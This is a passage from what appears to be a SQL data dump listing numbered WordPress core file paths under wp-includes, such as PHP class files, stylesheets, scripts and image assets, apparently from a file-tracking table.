045,'wp-includes/bookmark.php'),(8046,'wp-includes/cache.php'),(8047,'wp-includes/canonical.php'),(8048,'wp-includes/capabilities.php'),(8049,'wp-includes/category-template.php'),(8050,'wp-includes/category.php'),(8051,'wp-includes/certificates/ca-bundle.crt'),(8052,'wp-includes/class-IXR.php'),(8053,'wp-includes/class-feed.php'),(8054,'wp-includes/class-http.php'),(8055,'wp-includes/class-json.php'),(8056,'wp-includes/class-oembed.php'),(8057,'wp-includes/class-phpass.php'),(8058,'wp-includes/class-phpmailer.php'),(8059,'wp-includes/class-pop3.php'),(8060,'wp-includes/class-requests.php'),(8061,'wp-includes/class-simplepie.php'),(8062,'wp-includes/class-smtp.php'),(8063,'wp-includes/class-snoopy.php'),(8064,'wp-includes/class-walker-category-dropdown.php'),(8065,'wp-includes/class-walker-category.php'),(8066,'wp-includes/class-walker-comment.php'),(8067,'wp-includes/class-walker-nav-menu.php'),(8068,'wp-includes/class-walker-page-dropdown.php'),(8069,'wp-includes/class-walker-page.php'),(8070,'wp-includes/class-wp-admin-bar.php'),(8071,'wp-includes/class-wp-ajax-response.php'),(8072,'wp-includes/class-wp-block-parser.php'),(8073,'wp-includes/class-wp-block-styles-registry.php'),(8074,'wp-includes/class-wp-block-type-registry.php'),(8075,'wp-includes/class-wp-block-type.php'),(8076,'wp-includes/class-wp-comment-query.php'),(8077,'wp-includes/class-wp-comment.php'),(8078,'wp-includes/class-wp-customize-control.php'),(8079,'wp-includes/class-wp-customize-manager.php'),(8080,'wp-includes/class-wp-customize-nav-menus.php'),(8081,'wp-includes/class-wp-customize-panel.php'),(8082,'wp-includes/class-wp-customize-section.php'),(8083,'wp-includes/class-wp-customize-setting.php'),(8084,'wp-includes/class-wp-customize-widgets.php'),(8085,'wp-includes/class-wp-date-query.php'),(8086,'wp-includes/class-wp-dependency.php'),(8087,'wp-includes/class-wp-editor.php'),(8088,'wp-includes/class-wp-embed.php'),(8089,'wp-includes/class-wp-error.php'),(8090,'wp-includes/class-wp-fatal-error-handler.php'),(8091,'wp-includes/class-wp-feed-cache-transient.php'),(8092,'wp-includes/class-wp-feed-cache.php'),(8093,'wp-includes/class-wp-hook.php'),(8094,'wp-includes/class-wp-http-cookie.php'),(8095,'wp-includes/class-wp-http-curl.php'),(8096,'wp-includes/class-wp-http-encoding.php'),(8097,'wp-includes/class-wp-http-ixr-client.php'),(8098,'wp-includes/class-wp-http-proxy.php'),(8099,'wp-includes/class-wp-http-requests-hooks.php'),(8100,'wp-includes/class-wp-http-requests-response.php'),(8101,'wp-includes/class-wp-http-response.php'),(8102,'wp-includes/class-wp-http-streams.php'),(8103,'wp-includes/class-wp-image-editor-gd.php'),(8104,'wp-includes/class-wp-image-editor-imagick.php'),(8105,'wp-includes/class-wp-image-editor.php'),(8106,'wp-includes/class-wp-list-util.php'),(8107,'wp-includes/class-wp-locale-switcher.php'),(8108,'wp-includes/class-wp-locale.php'),(8109,'wp-includes/class-wp-matchesmapregex.php'),(8110,'wp-includes/class-wp-meta-query.php'),(8111,'wp-includes/class-wp-metadata-lazyloader.php'),(8112,'wp-includes/class-wp-network-query.php'),(8113,'wp-includes/class-wp-network.php'),(8114,'wp-includes/class-wp-object-cache.php'),(8115,'wp-includes/class-wp-oembed-controller.php'),(8116,'wp-includes/class-wp-oembed.php'),(8117,'wp-includes/class-wp-paused-extensions-storage.php'),(8118,'wp-includes/class-wp-post-type.php'),(8119,'wp-includes/class-wp-post.php'),(8120,'wp-includes/class-wp-query.php'),(8121,'wp-includes/class-wp-recovery-mode-cookie-service.php'),(8122,'wp-includes/class-wp-recovery-mode-email-service.php'),(8123,'wp-includes/class-wp-recovery-mode-key-service.php'),(8124,'wp-includes/class-wp-recovery-mode-link-service.php'),(8125,'wp-includes/class-wp-recovery-mode.php'),(8126,'wp-includes/class-wp-rewrite.php'),(8127,'wp-includes/class-wp-role.php'),(8128,'wp-includes/class-wp-roles.php'),(8129,'wp-includes/class-wp-session-tokens.php'),(8130,'wp-includes/class-wp-simplepie-file.php'),(8131,'wp-includes/class-wp-simplepie-sanitize-kses.php'),(8132,'wp-includes/class-wp-site-query.php'),(8133,'wp-includes/class-wp-site.php'),(8134,'wp-includes/class-wp-tax-query.php'),(8135,'wp-includes/class-wp-taxonomy.php'),(8136,'wp-includes/class-wp-term-query.php'),(8137,'wp-includes/class-wp-term.php'),(8138,'wp-includes/class-wp-text-diff-renderer-inline.php'),(8139,'wp-includes/class-wp-text-diff-renderer-table.php'),(8140,'wp-includes/class-wp-theme.php'),(8141,'wp-includes/class-wp-user-meta-session-tokens.php'),(8142,'wp-includes/class-wp-user-query.php'),(8143,'wp-includes/class-wp-user-request.php'),(8144,'wp-includes/class-wp-user.php'),(8145,'wp-includes/class-wp-walker.php'),(8146,'wp-includes/class-wp-widget-factory.php'),(8147,'wp-includes/class-wp-widget.php'),(8148,'wp-includes/class-wp-xmlrpc-server.php'),(8149,'wp-includes/class-wp.php'),(8150,'wp-includes/class.wp-dependencies.php'),(8151,'wp-includes/class.wp-scripts.php'),(8152,'wp-includes/class.wp-styles.php'),(8153,'wp-includes/comment-template.php'),(8154,'wp-includes/comment.php'),(8155,'wp-includes/compat.php'),(8156,'wp-includes/cron.php'),(8157,'wp-includes/css/admin-bar-rtl.css'),(8158,'wp-includes/css/admin-bar-rtl.min.css'),(8159,'wp-includes/css/admin-bar.css'),(8160,'wp-includes/css/admin-bar.min.css'),(8161,'wp-includes/css/buttons-rtl.css'),(8162,'wp-includes/css/buttons-rtl.min.css'),(8163,'wp-includes/css/buttons.css'),(8164,'wp-includes/css/buttons.min.css'),(8165,'wp-includes/css/customize-preview-rtl.css'),(8166,'wp-includes/css/customize-preview-rtl.min.css'),(8167,'wp-includes/css/customize-preview.css'),(8168,'wp-includes/css/customize-preview.min.css'),(8169,'wp-includes/css/dashicons.css'),(8170,'wp-includes/css/dashicons.min.css'),(8171,'wp-includes/css/dist/block-directory/style-rtl.css'),(8172,'wp-includes/css/dist/block-directory/style-rtl.min.css'),(8173,'wp-includes/css/dist/block-directory/style.css'),(8174,'wp-includes/css/dist/block-directory/style.min.css'),(8175,'wp-includes/css/dist/block-editor/style-rtl.css'),(8176,'wp-includes/css/dist/block-editor/style-rtl.min.css'),(8177,'wp-includes/css/dist/block-editor/style.css'),(8178,'wp-includes/css/dist/block-editor/style.min.css'),(8179,'wp-includes/css/dist/block-library/editor-rtl.css'),(8180,'wp-includes/css/dist/block-library/editor-rtl.min.css'),(8181,'wp-includes/css/dist/block-library/editor.css'),(8182,'wp-includes/css/dist/block-library/editor.min.css'),(8183,'wp-includes/css/dist/block-library/style-rtl.css'),(8184,'wp-includes/css/dist/block-library/style-rtl.min.css'),(8185,'wp-includes/css/dist/block-library/style.css'),(8186,'wp-includes/css/dist/block-library/style.min.css'),(8187,'wp-includes/css/dist/block-library/theme-rtl.css'),(8188,'wp-includes/css/dist/block-library/theme-rtl.min.css'),(8189,'wp-includes/css/dist/block-library/theme.css'),(8190,'wp-includes/css/dist/block-library/theme.min.css'),(8191,'wp-includes/css/dist/components/style-rtl.css'),(8192,'wp-includes/css/dist/components/style-rtl.min.css'),(8193,'wp-includes/css/dist/components/style.css'),(8194,'wp-includes/css/dist/components/style.min.css'),(8195,'wp-includes/css/dist/edit-post/style-rtl.css'),(8196,'wp-includes/css/dist/edit-post/style-rtl.min.css'),(8197,'wp-includes/css/dist/edit-post/style.css'),(8198,'wp-includes/css/dist/edit-post/style.min.css'),(8199,'wp-includes/css/dist/editor/editor-styles-rtl.css'),(8200,'wp-includes/css/dist/editor/editor-styles-rtl.min.css'),(8201,'wp-includes/css/dist/editor/editor-styles.css'),(8202,'wp-includes/css/dist/editor/editor-styles.min.css'),(8203,'wp-includes/css/dist/editor/style-rtl.css'),(8204,'wp-includes/css/dist/editor/style-rtl.min.css'),(8205,'wp-includes/css/dist/editor/style.css'),(8206,'wp-includes/css/dist/editor/style.min.css'),(8207,'wp-includes/css/dist/format-library/style-rtl.css'),(8208,'wp-includes/css/dist/format-library/style-rtl.min.css'),(8209,'wp-includes/css/dist/format-library/style.css'),(8210,'wp-includes/css/dist/format-library/style.min.css'),(8211,'wp-includes/css/dist/list-reusable-blocks/style-rtl.css'),(8212,'wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css'),(8213,'wp-includes/css/dist/list-reusable-blocks/style.css'),(8214,'wp-includes/css/dist/list-reusable-blocks/style.min.css'),(8215,'wp-includes/css/dist/nux/style-rtl.css'),(8216,'wp-includes/css/dist/nux/style-rtl.min.css'),(8217,'wp-includes/css/dist/nux/style.css'),(8218,'wp-includes/css/dist/nux/style.min.css'),(8219,'wp-includes/css/editor-rtl.css'),(8220,'wp-includes/css/editor-rtl.min.css'),(8221,'wp-includes/css/editor.css'),(8222,'wp-includes/css/editor.min.css'),(8223,'wp-includes/css/jquery-ui-dialog-rtl.css'),(8224,'wp-includes/css/jquery-ui-dialog-rtl.min.css'),(8225,'wp-includes/css/jquery-ui-dialog.css'),(8226,'wp-includes/css/jquery-ui-dialog.min.css'),(8227,'wp-includes/css/media-views-rtl.css'),(8228,'wp-includes/css/media-views-rtl.min.css'),(8229,'wp-includes/css/media-views.css'),(8230,'wp-includes/css/media-views.min.css'),(8231,'wp-includes/css/wp-auth-check-rtl.css'),(8232,'wp-includes/css/wp-auth-check-rtl.min.css'),(8233,'wp-includes/css/wp-auth-check.css'),(8234,'wp-includes/css/wp-auth-check.min.css'),(8235,'wp-includes/css/wp-embed-template-ie.css'),(8236,'wp-includes/css/wp-embed-template-ie.min.css'),(8237,'wp-includes/css/wp-embed-template.css'),(8238,'wp-includes/css/wp-embed-template.min.css'),(8239,'wp-includes/css/wp-pointer-rtl.css'),(8240,'wp-includes/css/wp-pointer-rtl.min.css'),(8241,'wp-includes/css/wp-pointer.css'),(8242,'wp-includes/css/wp-pointer.min.css'),(8243,'wp-includes/customize/class-wp-customize-background-image-control.php'),(8244,'wp-includes/customize/class-wp-customize-background-image-setting.php'),(8245,'wp-includes/customize/class-wp-customize-background-position-control.php'),(8246,'wp-includes/customize/class-wp-customize-code-editor-control.php'),(8247,'wp-includes/customize/class-wp-customize-color-control.php'),(8248,'wp-includes/customize/class-wp-customize-cropped-image-control.php'),(8249,'wp-includes/customize/class-wp-customize-custom-css-setting.php'),(8250,'wp-includes/customize/class-wp-customize-date-time-control.php'),(8251,'wp-includes/customize/class-wp-customize-filter-setting.php'),(8252,'wp-includes/customize/class-wp-customize-header-image-control.php'),(8253,'wp-includes/customize/class-wp-customize-header-image-setting.php'),(8254,'wp-includes/customize/class-wp-customize-image-control.php'),(8255,'wp-includes/customize/class-wp-customize-media-control.php'),(8256,'wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php'),(8257,'wp-includes/customize/class-wp-customize-nav-menu-control.php'),(8258,'wp-includes/customize/class-wp-customize-nav-menu-item-control.php'),(8259,'wp-includes/customize/class-wp-customize-nav-menu-item-setting.php'),(8260,'wp-includes/customize/class-wp-customize-nav-menu-location-control.php'),(8261,'wp-includes/customize/class-wp-customize-nav-menu-locations-control.php'),(8262,'wp-includes/customize/class-wp-customize-nav-menu-name-control.php'),(8263,'wp-includes/customize/class-wp-customize-nav-menu-section.php'),(8264,'wp-includes/customize/class-wp-customize-nav-menu-setting.php'),(8265,'wp-includes/customize/class-wp-customize-nav-menus-panel.php'),(8266,'wp-includes/customize/class-wp-customize-new-menu-control.php'),(8267,'wp-includes/customize/class-wp-customize-new-menu-section.php'),(8268,'wp-includes/customize/class-wp-customize-partial.php'),(8269,'wp-includes/customize/class-wp-customize-selective-refresh.php'),(8270,'wp-includes/customize/class-wp-customize-sidebar-section.php'),(8271,'wp-includes/customize/class-wp-customize-site-icon-control.php'),(8272,'wp-includes/customize/class-wp-customize-theme-control.php'),(8273,'wp-includes/customize/class-wp-customize-themes-panel.php'),(8274,'wp-includes/customize/class-wp-customize-themes-section.php'),(8275,'wp-includes/customize/class-wp-customize-upload-control.php'),(8276,'wp-includes/customize/class-wp-widget-area-customize-control.php'),(8277,'wp-includes/customize/class-wp-widget-form-customize-control.php'),(8278,'wp-includes/date.php'),(8279,'wp-includes/default-constants.php'),(8280,'wp-includes/default-filters.php'),(8281,'wp-includes/default-widgets.php'),(8282,'wp-includes/deprecated.php'),(8283,'wp-includes/embed-template.php'),(8284,'wp-includes/embed.php'),(8285,'wp-includes/error-protection.php'),(8286,'wp-includes/feed-atom-comments.php'),(8287,'wp-includes/feed-atom.php'),(8288,'wp-includes/feed-rdf.php'),(8289,'wp-includes/feed-rss.php'),(8290,'wp-includes/feed-rss2-comments.php'),(8291,'wp-includes/feed-rss2.php'),(8292,'wp-includes/feed.php'),(8293,'wp-includes/fonts/dashicons.eot'),(8294,'wp-includes/fonts/dashicons.svg'),(8295,'wp-includes/fonts/dashicons.ttf'),(8296,'wp-includes/fonts/dashicons.woff'),(8297,'wp-includes/fonts/dashicons.woff2'),(8298,'wp-includes/formatting.php'),(8299,'wp-includes/functions.php'),(8300,'wp-includes/functions.wp-scripts.php'),(8301,'wp-includes/functions.wp-styles.php'),(8302,'wp-includes/general-template.php'),(8303,'wp-includes/http.php'),(8304,'wp-includes/images/admin-bar-sprite-2x.png'),(8305,'wp-includes/images/admin-bar-sprite.png'),(8306,'wp-includes/images/arrow-pointer-blue-2x.png'),(8307,'wp-includes/images/arrow-pointer-blue.png'),(8308,'wp-includes/images/blank.gif'),(8309,'wp-includes/images/crystal/archive.png'),(8310,'wp-includes/images/crystal/audio.png'),(8311,'wp-includes/images/crystal/code.png'),(8312,'wp-includes/images/crystal/default.png'),(8313,'wp-includes/images/crystal/document.png'),(8314,'wp-includes/images/crystal/interactive.png'),(8315,'wp-includes/images/crystal/license.txt'),(8316,'wp-includes/images/crystal/spreadsheet.png'),(8317,'wp-includes/images/crystal/text.png'),(8318,'wp-includes/images/crystal/video.png'),(8319,'wp-includes/images/down_arrow-2x.gif'),(8320,'wp-includes/images/down_arrow.gif'),(8321,'wp-includes/images/icon-pointer-flag-2x.png'),(8322,'wp-includes/images/icon-pointer-flag.png'),(8323,'wp-includes/images/media/archive.png'),(8324,'wp-includes/images/media/audio.png'),(8325,'wp-includes/images/media/code.png'),(8326,'wp-includes/images/media/default.png'),(8327,'wp-includes/images/media/document.png'),(8328,'wp-includes/images/media/interactive.png'),(8329,'wp-includes/images/media/spreadsheet.png'),(8330,'wp-includes/images/media/text.png'),(8331,'wp-includes/images/media/video.png'),(8332,'wp-includes/images/rss-2x.png'),(8333,'wp-includes/images/rss.png'),(8334,'wp-includes/images/smilies/frownie.png'),(8335,'wp-includes/images/smilies/icon_arrow.gif'),(8336,'wp-includes/images/smilies/icon_biggrin.gif'),(8337,'wp-includes/images/smilies/icon_confused.gif'),(8338,'wp-includes/images/smilies/icon_cool.gif'),(8339,'wp-includes/images/smilies/icon_cry.gif'),(8340,'wp-includes/images/smilies/icon_eek.gif'),(8341,'wp-includes/images/smilies/icon_evil.gif'),(8342,'wp-includes/images/smilies/icon_exclaim.gif'),(8343,'wp-includes/images/smilies/icon_idea.gif'),(8344,'wp-includes/images/smilies/icon_lol.gif'),(8345,'wp-includes/images/smilies/icon_mad.gif'),(8346,'wp-includes/images/smilies/icon_mrgreen.gif'),(8347,'wp-includes/images/smilies/icon_neutral.gif'),(8348,'wp-includes/images/smilies/icon_question.gif'),(8349,'wp-includes/images/smilies/icon_razz.gif'),(8350,'wp-includes/images/smilies/icon_redface.gif'),(8351,'wp-includes/images/smilies/icon_rolleyes.gif'),(8352,'wp-includes/images/smilies/icon_sad.gif'),(8353,'wp-includes/images/smilies/icon_smile.gif'),(8354,'wp-includes/images/smilies/icon_surprised.gif'),(8355,'wp-includes/images/smilies/icon_twisted.gif'),(8356,'wp-includes/images/smilies/icon_wink.gif'),(8357,'wp-includes/images/smilies/mrgreen.png'),(8358,'wp-includes/images/smilies/rolleyes.png'),(8359,'wp-includes/images/smilies/simple-smile.png'),(8360,'wp-includes/images/spinner-2x.gif'),(8361,'wp-includes/images/spinner.gif'),(8362,'wp-includes/images/toggle-arrow-2x.png'),(8363,'wp-includes/images/toggle-arrow.png'),(8364,'wp-includes/images/uploader-icons-2x.png'),(8365,'wp-includes/images/uploader-icons.png'),(8366,'wp-includes/images/w-logo-blue-white-bg.png'),(8367,'wp-includes/images/w-logo-blue.png'),(8368,'wp-includes/images/wlw/wp-comments.png'),(8369,'wp-includes/images/wlw/wp-icon.png'),(8370,'wp-includes/images/wlw/wp-watermark.png'),(8371,'wp-includes/images/wpicons-2x.png'),(8372,'wp-includes/images/wpicons.png'),(8373,'wp-includes/images/wpspin-2x.gif'),(8374,'wp-includes/images/wpspin.gif'),(8375,'wp-includes/images/xit-2x.gif'),(8376,'wp-includes/images/xit.gif'),(8377,'wp-includes/js/admin-bar.js'),(8378,'wp-includes/js/admin-bar.min.js'),(8379,'wp-includes/js/api-request.js'),(8380,'wp-includes/js/api-request.min.js'),(8381,'wp-includes/js/autosave.js'),(8382,'wp-includes/js/autosave.min.js'),(8383,'wp-includes/js/backbone.js'),(8384,'wp-includes/js/backbone.min.js'),(8385,'wp-includes/js/clipboard.js'),(8386,'wp-includes/js/clipboard.min.js'),(8387,'wp-includes/js/codemirror/codemirror.min.css'),(8388,'wp-includes/js/codemirror/codemirror.min.js'),(8389,'wp-includes/js/codemirror/csslint.js'),(8390,'wp-includes/js/codemirror/esprima.js'),(8391,'wp-includes/js/codemirror/fakejshint.js'),(8392,'wp-includes/js/codemirror/htmlhint-kses.js'),(8393,'wp-includes/js/codemirror/htmlhint.js'),(8394,'wp-includes/js/codemirror/jsonlint.js'),(8395,'wp-includes/js/colorpicker.js'),(8396,'wp-includes/js/colorpicker.min.js'),(8397,'wp-includes/js/comment-reply.js'),(8398,'wp-includes/js/comment-reply.min.js'),(8399,'wp-includes/js/crop/cropper.css'),(8400,'wp-includes/js/crop/cropper.js'),(8401,'wp-includes/js/crop/marqueeHoriz.gif'),(8402,'wp-includes/js/crop/marqueeVert.gif'),(8403,'wp-includes/js/customize-base.js'),(8404,'wp-includes/js/customize-base.min.js'),(8405,'wp-includes/js/customize-loader.js'),(8406,'wp-includes/js/customize-loader.min.js'),(8407,'wp-includes/js/customize-models.js'),(8408,'wp-includes/js/customize-models.min.js'),(8409,'wp-includes/js/customize-preview-nav-menus.js'),(8410,'wp-includes/js/customize-preview-nav-menus.min.js'),(8411,'wp-includes/js/customize-preview-widgets.js'),(8412,'wp-includes/js/customize-preview-widgets.min.js'),(8413,'wp-includes/js/customize-preview.js'),(8414,'wp-includes/js/customize-preview.min.js'),(8415,'wp-includes/js/customize-selective-refresh.js'),(8416,'wp-includes/js/customize-selective-refresh.min.js'),(8417,'wp-includes/js/customize-views.js'),(8418,'wp-includes/js/customize-views.min.js'),(8419,'wp-includes/js/dist/a11y.js'),(8420,'wp-includes/js/dist/a11y.min.js'),(8421,'wp-includes/js/dist/annotations.js'),(8422,'wp-includes/js/dist/annotations.min.js'),(8423,'wp-includes/js/dist/api-fetch.js'),(8424,'wp-includes/js/dist/api-fetch.min.js'),(8425,'wp-includes/js/dist/autop.js'),(8426,'wp-includes/js/dist/autop.min.js'),(8427,'wp-includes/js/dist/blob.js'),(8428,'wp-includes/js/dist/blob.min.js'),(8429,'wp-includes/js/dist/block-directory.js'),(8430,'wp-includes/js/dist/block-directory.min.js'),(8431,'wp-includes/js/dist/block-editor.js'),(8432,'wp-includes/js/dist/block-editor.min.js'),(8433,'wp-includes/js/dist/block-library.js'),(8434,'wp-includes/js/dist/block-library.min.js'),(8435,'wp-includes/js/dist/block-serialization-default-parser.js'),(8436,'wp-includes/js/dist/block-serialization-default-parser.min.js'),(8437,'wp-includes/js/dist/blocks.js'),(8438,'wp-includes/js/dist/blocks.min.js'),(8439,'wp-includes/js/dist/components.js'),(8440,'wp-includes/js/dist/components.min.js'),(8441,'wp-includes/js/dist/compose.js'),(8442,'wp-includes/js/dist/compose.min.js'),(8443,'wp-includes/js/dist/core-data.js'),(8444,'wp-includes/js/dist/core-data.min.js'),(8445,'wp-includes/js/dist/data-controls.js'),(8446,'wp-includes/js/dist/data-controls.min.js'),(8447,'wp-includes/js/dist/data.js'),(8448,'wp-includes/js/dist/data.min.js'),(8449,'wp-includes/js/dist/date.js'),(8450,'wp-includes/js/dist/date.min.js'),(8451,'wp-includes/js/dist/deprecated.js'),(8452,'wp-includes/js/dist/deprecated.min.js'),(8453,'wp-includes/js/dist/dom-ready.js'),(8454,'wp-includes/js/dist/dom-ready.min.js'),(8455,'wp-includes/js/dist/dom.js'),(8456,'wp-includes/js/dist/dom.min.js'),(8457,'wp-includes/js/dist/edit-post.js'),(8458,'wp-includes/js/dist/edit-post.min.js'),(8459,'wp-includes/js/dist/editor.js'),(8460,'wp-includes/js/dist/editor.min.js'),(8461,'wp-includes/js/dist/element.js'),(8462,'wp-includes/js/dist/element.min.js'),(8463,'wp-includes/js/dist/escape-html.js'),(8464,'wp-includes/js/dist/escape-html.min.js'),(8465,'wp-includes/js/dist/format-library.js'),(8466,'wp-includes/js/dist/format-library.min.js'),(8467,'wp-includes/js/dist/hooks.js'),(8468,'wp-includes/js/dist/hooks.min.js'),(8469,'wp-includes/js/dist/html-entities.js'),(8470,'wp-includes/js/dist/html-entities.min.js'),(8471,'wp-includes/js/dist/i18n.js'),(8472,'wp-includes/js/dist/i18n.min.js'),(8473,'wp-includes/js/dist/is-shallow-equal.js'),(8474,'wp-includes/js/dist/is-shallow-equal.min.js'),(8475,'wp-includes/js/dist/keyboard-shortcuts.js'),(8476,'wp-includes/js/dist/keyboard-shortcuts.min.js'),(8477,'wp-includes/js/dist/keycodes.js'),(8478,'wp-includes/js/dist/keycodes.min.js'),(8479,'wp-includes/js/dist/list-reusable-blocks.js'),(8480,'wp-includes/js/dist/list-reusable-blocks.min.js'),(8481,'wp-includes/js/dist/media-utils.js'),(8482,'wp-includes/js/dist/media-utils.min.js'),(8483,'wp-includes/js/dist/notices.js'),(8484,'wp-includes/js/dist/notices.min.js'),(8485,'wp-includes/js/dist/nux.js'),(8486,'wp-includes/js/dist/nux.min.js'),(8487,'wp-includes/js/dist/plugins.js'),(8488,'wp-includes/js/dist/plugins.min.js'),(8489,'wp-includes/js/dist/primitives.js'),(8490,'wp-includes/js/dist/primitives.min.js'),(8491,'wp-includes/js/dist/priority-queue.js'),(8492,'wp-includes/js/dist/priority-queue.min.js'),(8493,'wp-includes/js/dist/redux-routine.js'),(8494,'wp-includes/js/dist/redux-routine.min.js'),(8495,'wp-includes/js/dist/rich-text.js'),(8496,'wp-includes/js/dist/rich-text.min.js'),(8497,'wp-includes/js/dist/server-side-render.js'),(8498,'wp-includes/js/dist/server-side-render.min.js'),(8499,'wp-includes/js/dist/shortcode.js'),(8500,'wp-includes/js/dist/shortcode.min.js'),(8501,'wp-includes/js/dist/token-list.js'),(8502,'wp-includes/js/dist/token-list.min.js'),(8503,'wp-includes/js/dist/url.js'),(8504,'wp-includes/js/dist/url.min.js'),(8505,'wp-includes/js/dist/vendor/lodash.js'),(8506,'wp-includes/js/dist/vendor/lodash.min.js'),(8507,'wp-includes/js/dist/vendor/moment.js'),(8508,'wp-includes/js/dist/vendor/moment.min.js'),(8509,'wp-includes/js/dist/vendor/react-dom.js'),(8510,'wp-includes/js/dist/vendor/react-dom.min.js'),(8511,'wp-includes/js/dist/vendor/react.js'),(8512,'wp-includes/js/dist/vendor/react.min.js'),(8513,'wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js'),(8514,'wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js'),(8515,'wp-includes/js/dist/vendor/wp-polyfill-element-closest.js'),(8516,'wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js'),(8517,'wp-includes/js/dist/vendor/wp-polyfill-fetch.js'),(8518,'wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js'),(8519,'wp-includes/js/dist/vendor/wp-polyfill-formdata.js'),(8520,'wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js'),(8521,'wp-includes/js/dist/vendor/wp-polyfill-node-contains.js'),(8522,'wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js'),(8523,'wp-includes/js/dist/vendor/wp-polyfill-url.js'),(8524,'wp-includes/js/dist/vendor/wp-polyfill-url.min.js'),(8525,'wp-includes/js/dist/vendor/wp-polyfill.js'),(8526,'wp-includes/js/dist/vendor/wp-polyfill.min.js'),(8527,'wp-includes/js/dist/viewport.js'),(8528,'wp-includes/js/dist/viewport.min.js'),(8529,'wp-includes/js/dist/warning.js'),(8530,'wp-includes/js/dist/warning.min.js'),(8531,'wp-includes/js/dist/wordcount.js'),(8532,'wp-includes/js/dist/wordcount.min.js'),(8533,'wp-includes/js/heartbeat.js'),(8534,'wp-includes/js/heartbeat.min.js'),(8535,'wp-includes/js/hoverIntent.js'),(8536,'wp-includes/js/hoverIntent.min.js'),(8537,'wp-includes/js/hoverintent-js.min.js'),(8538,'wp-includes/js/imagesloaded.min.js'),(8539,'wp-includes/js/imgareaselect/border-anim-h.gif'),(8540,'wp-includes/js/imgareaselect/border-anim-v.gif'),(8541,'wp-includes/js/imgareaselect/imgareaselect.css'),(8542,'wp-includes/js/imgareaselect/jquery.imgareaselect.js'),(8543,'wp-includes/js/imgareaselect/jquery.imgareaselect.min.js'),(8544,'wp-includes/js/jcrop/Jcrop.gif'),(8545,'wp-includes/js/jcrop/jquery.Jcrop.min.css'),(8546,'wp-includes/js/jcrop/jquery.Jcrop.min.js'),(8547,'wp-includes/js/jquery/jquery-migrate.js'),(8548,'wp-includes/js/jquery/jquery-migrate.min.js'),(8549,'wp-includes/js/jquery/jquery.color.min.js'),(8550,'wp-includes/js/jquery/jquery.form.js'),(8551,'wp-includes/js/jquery/jquery.form.min.js'),(8552,'wp-includes/js/jquery/jquery.hotkeys.js'),(8553,'wp-includes/js/jquery/jquery.hotkeys.min.js'),(8554,'wp-includes/js/jquery/jquery.js'),(8555,'wp-includes/js/jquery/jquery.masonry.min.js'),(8556,'wp-includes/js/jquery/jquery.query.js'),(8557,'wp-includes/js/jquery/jquery.schedule.js'),(8558,'wp-includes/js/jquery/jquery.serialize-object.js'),(8559,'wp-includes/js/jquery/jquery.table-hotkeys.js'),(8560,'wp-includes/js/jquery/jquery.table-hotkeys.min.js'),(8561,'wp-includes/js/jquery/jquery.ui.touch-punch.js'),(8562,'wp-includes/js/jquery/suggest.js'),(8563,'wp-includes/js/jquery/suggest.min.js'),(8564,'wp-includes/js/jquery/ui/accordion.min.js'),(8565,'wp-includes/js/jquery/ui/autocomplete.min.js'),(8566,'wp-includes/js/jquery/ui/button.min.js'),(8567,'wp-includes/js/jquery/ui/core.min.js'),(8568,'wp-includes/js/jquery/ui/datepicker.min.js'),(8569,'wp-includes/js/jquery/ui/dialog.min.js'),(8570,'wp-includes/js/jquery/ui/draggable.min.js'),(8571,'wp-includes/js/jquery/ui/droppable.min.js'),(8572,'wp-includes/js/jquery/ui/effect-blind.min.js'),(8573,'wp-includes/js/jquery/ui/effect-bounce.min.js'),(8574,'wp-includes/js/jquery/ui/effect-clip.min.js'),(8575,'wp-includes/js/jquery/ui/effect-drop.min.js'),(8576,'wp-includes/js/jquery/ui/effect-explode.min.js'),(8577,'wp-includes/js/jquery/ui/effect-fade.min.js'),(8578,'wp-includes/js/jquery/ui/effect-fold.min.js'),(8579,'wp-includes/js/jquery/ui/effect-highlight.min.js'),(8580,'wp-includes/js/jquery/ui/effect-puff.min.js'),(8581,'wp-includes/js/jquery/ui/effect-pulsate.min.js'),(8582,'wp-includes/js/jquery/ui/effect-scale.min.js'),(8583,'wp-includes/js/jquery/ui/effect-shake.min.js'),(8584,'wp-includes/js/jquery/ui/effect-size.min.js'),(8585,'wp-includes/js/jquery/ui/effect-slide.min.js'),(8586,'wp-includes/js/jquery/ui/effect-transfer.min.js'),(8587,'wp-includes/js/jquery/ui/effect.min.js'),(8588,'wp-includes/js/jquery/ui/menu.min.js'),(8589,'wp-includes/js/jquery/ui/mouse.min.js'),(8590,'wp-includes/js/jquery/ui/position.min.js'),(8591,'wp-includes/js/jquery/ui/progressbar.min.js'),(8592,'wp-includes/js/jquery/ui/resizable.min.js'),(8593,'wp-includes/js/jquery/ui/selectable.min.js'),(8594,'wp-includes/js/jquery/ui/selectmenu.min.js'),(8595,'wp-includes/js/jquery/ui/slider.min.js'),(8596,'wp-includes/js/jquery/ui/sortable.min.js'),(8597,'wp-includes/js/jquery/ui/spinner.min.js'),(8598,'wp-includes/js/jquery/ui/tabs.min.js'),(8599,'wp-includes/js/jquery/ui/tooltip.min.js'),(8600,'wp-includes/js/jquery/ui/widget.min.js'),(8601,'wp-includes/js/json2.js'),(8602,'wp-includes/js/json2.min.js'),(8603,'wp-includes/js/masonry.min.js'),(8604,'wp-includes/js/mce-view.js'),(8605,'wp-includes/js/mce-view.min.js'),(8606,'wp-includes/js/media-audiovideo.js'),(8607,'wp-includes/js/media-audiovideo.min.js'),(8608,'wp-includes/js/media-editor.js'),(8609,'wp-includes/js/media-editor.min.js'),(8610,'wp-includes/js/media-grid.js'),(8611,'wp-includes/js/media-grid.min.js'),(8612,'wp-includes/js/media-models.js'),(8613,'wp-includes/js/media-models.min.js'),(8614,'wp-includes/js/media-views.js'),(8615,'wp-includes/js/media-views.min.js'),(8616,'wp-includes/js/mediaelement/mediaelement-and-player.js'),(8617,'wp-includes/js/mediaelement/mediaelement-and-player.min.js'),(8618,'wp-includes/js/mediaelement/mediaelement-migrate.js'),(8619,'wp-includes/js/mediaelement/mediaelement-migrate.min.js'),(8620,'wp-includes/js/mediaelement/mediaelement.js'),(8621,'wp-includes/js/mediaelement/mediaelement.min.js'),(8622,'wp-includes/js/mediaelement/mediaelementplayer-legacy.css'),(86